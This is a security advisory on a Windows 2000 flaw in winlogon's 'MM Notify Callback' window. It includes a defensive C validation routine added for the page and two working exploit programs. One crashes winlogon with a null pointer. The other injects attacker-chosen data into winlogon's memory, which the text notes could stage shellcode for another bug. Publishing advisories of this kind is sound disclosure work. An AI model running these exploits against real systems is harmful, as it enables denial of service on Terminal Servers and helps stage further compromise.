COMMAND

    winlogon

SYSTEMS AFFECTED

    Win2000

PROBLEM

    'ryagin' found the following.  In addition to the recently reported
    "NetDDE Agent" window hosted by winlogon.exe, there is another window,
    "MM Notify Callback".  It is hosted by winmm.dll, which is loaded into
    winlogon.exe.

    Its window procedure appears to handle only a few messages: WM_CREATE,
    WM_DESTROY, WM_CLOSE, WM_TIMER and, most interestingly, WM_DEVICECHANGE.

    The primary role of the WM_DEVICECHANGE message is to inform user-mode
    code about device plug/unplug and related events.

    The "MM Notify Callback" window handles only the DBT_DEVICEARRIVAL
    [0x8000] and DBT_DEVICEREMOVECOMPLETE [0x8004] sub-messages (arriving
    in wParam).

    When it receives one of these messages, it reads a data structure,
    interpreting lParam as a pointer to it.  The structure must have the
    value 0x00000005 at offset 0x4, a specific GUID at offset 0xC, and a
    null-terminated Unicode string at offset 0x1C.
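
    To show what a handler would have to check before trusting the block
    described above (type 5 at offset 0x4, the GUID at 0xC, a
    null-terminated UTF-16 name at 0x1C), here is an added validation
    routine written for this page; it is not winmm.dll's code and does not
    claim to be how winmm handles the message.  It assumes a 260-character
    cap on the name (MAX_NAME_CHARS) and takes the readable length of the
    block as an explicit parameter, since the advisory does not say how the
    handler learns it.

```c
#include <stdint.h>
#include <string.h>

/* Offsets the advisory gives; they match the Win32 DEV_BROADCAST_DEVICEINTERFACE_W
   layout: size at +0, devicetype at +4, classguid at +0xC, UTF-16 name at +0x1C. */
#define OFF_TYPE  0x04u
#define OFF_GUID  0x0Cu
#define OFF_NAME  0x1Cu
#define DBT_DEVTYP_DEVICEINTERFACE 5u
#define MAX_NAME_CHARS 260u   /* assumption: MAX_PATH-sized cap on the name */

/* GUID from the advisory's exploit array, {6994AD04-93EF-11D0-A3CC-00A0C9223196}
   (KSCATEGORY_AUDIO), as the little-endian bytes that sit at +0x0C in memory. */
static const uint8_t EXPECTED_GUID[16] = {
    0x04,0xAD,0x94,0x69, 0xEF,0x93, 0xD0,0x11, 0xA3,0xCC,0x00,0xA0,0xC9,0x22,0x31,0x96 };

enum dbcc_status { DBCC_OK = 0, DBCC_NULL, DBCC_TRUNCATED, DBCC_BAD_TYPE, DBCC_BAD_GUID, DBCC_NAME_UNTERMINATED };

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
/* Validate a block of `avail` readable bytes before any field is trusted. The header
   plus one WCHAR must fit in both `avail` and the declared size; the name scan is
   capped by the declared size and MAX_NAME_CHARS, so it never runs off the end. */
enum dbcc_status validate_dev_broadcast(const uint8_t *blk, size_t avail, size_t *name_chars)
{
    uint32_t size = 0; size_t n, max_chars;
    if (blk == NULL) return DBCC_NULL;                    /* exploit 1: lParam == 0 */
    if (avail < OFF_NAME + 2 || (size = rd32(blk)) < OFF_NAME + 2 || size > avail)
        return DBCC_TRUNCATED;
    if (rd32(blk + OFF_TYPE) != DBT_DEVTYP_DEVICEINTERFACE) return DBCC_BAD_TYPE;
    if (memcmp(blk + OFF_GUID, EXPECTED_GUID, 16) != 0) return DBCC_BAD_GUID;
    max_chars = (size - OFF_NAME) / 2;
    if (max_chars > MAX_NAME_CHARS) max_chars = MAX_NAME_CHARS;
    for (n = 0; n < max_chars; n++)
        if (rd16(blk + OFF_NAME + 2 * n) == 0) { if (name_chars) *name_chars = n; return DBCC_OK; }
    return DBCC_NAME_UNTERMINATED;        /* exploit 2: 'ABCD' x 0x1000 with no terminator */
}

/* Build a constructed, well-formed block (ASCII name widened to UTF-16LE);
   returns bytes written, or 0 if `cap` is too small. */
size_t build_dev_broadcast(uint8_t *out, size_t cap, const char *ascii_name)
{
    size_t i, len = strlen(ascii_name), total = OFF_NAME + 2 * (len + 1);
    uint32_t size = (uint32_t)total, type = DBT_DEVTYP_DEVICEINTERFACE;
    if (total > cap) return 0;
    memset(out, 0, total);
    memcpy(out, &size, 4); memcpy(out + OFF_TYPE, &type, 4);
    memcpy(out + OFF_GUID, EXPECTED_GUID, 16);
    for (i = 0; i < len; i++) out[OFF_NAME + 2 * i] = (uint8_t)ascii_name[i];
    return total;
}
```

    Bounded checks like these keep a handler from scanning past an
    unterminated name, but they do not by themselves make an lParam
    supplied by another process safe to dereference; a null lParam, as in
    exploit 1, is rejected here before any field is read.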

    This issue most probably cannot be used to execute code with SYSTEM
    privileges, but that would require more careful research.  A quick look
    at the winmm.dll code shows that the supplied structure is not used in
    copy operations to arbitrary memory addresses; however, a region of
    winlogon's memory can be filled with practically any user-supplied data
    (the only prohibited value is the Unicode 0x0000 string terminator).

    This could serve, for example, as shellcode for another winlogon bug.
    In any case, by running the exploit at the bottom of this message, you
    can crash winlogon.exe with an access violation.

    This has little value on ordinary workstations and servers, but it can
    be used for denial of service against Terminal Servers.

    Exploit 1: crashes winlogon with an access violation
    Exploit 2: injects the string 'ABCD' x 0x1000 (in Unicode) into
               winlogon's memory space

    ----- exploit 1-------
    #include <windows.h>
    #include <stdio.h>
    
    /* placeholder DWORD, type 5 at offset 0x4, placeholder, GUID at 0xC
       (not used here: lParam is sent as 0) */
    DWORD exploit[]={0x11223344,0x5, 0x55667788,
      0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
    };
    
    int main()
    {
      HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
      printf("Window=%x\n",hwnd);
      SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,0x00000000);
      //                                        ^^^^^^^^^^ lParam 0: address that faults (AV)
      return 0;
    }
    
    ----- exploit 2-------
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>   /* malloc */
    
    /* placeholder DWORD, type 5 at offset 0x4, placeholder, GUID at 0xC */
    DWORD exploit[]={0x11223344,0x5, 0x55667788,
      0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
    };
    
    int main()
    {
      DWORD *ptr;
      DWORD i,j;
      HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
      printf("Window=%x\n",hwnd);
      /* header followed by 0x1000 DWORDs of 'ABCD', with no string terminator */
      ptr = (DWORD*)malloc(0x1000*4+sizeof(exploit));
      for(i=0;i<sizeof(exploit)/sizeof(exploit[0]);i++)
        ptr[i]=exploit[i];
    
      for(j=0;j<0x1000;j++) ptr[i+j]='ABCD';   /* multi-character constant, 0x41424344 */
    
      SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,(DWORD)ptr);
      return 0;
    }

SOLUTION

    Nothing yet.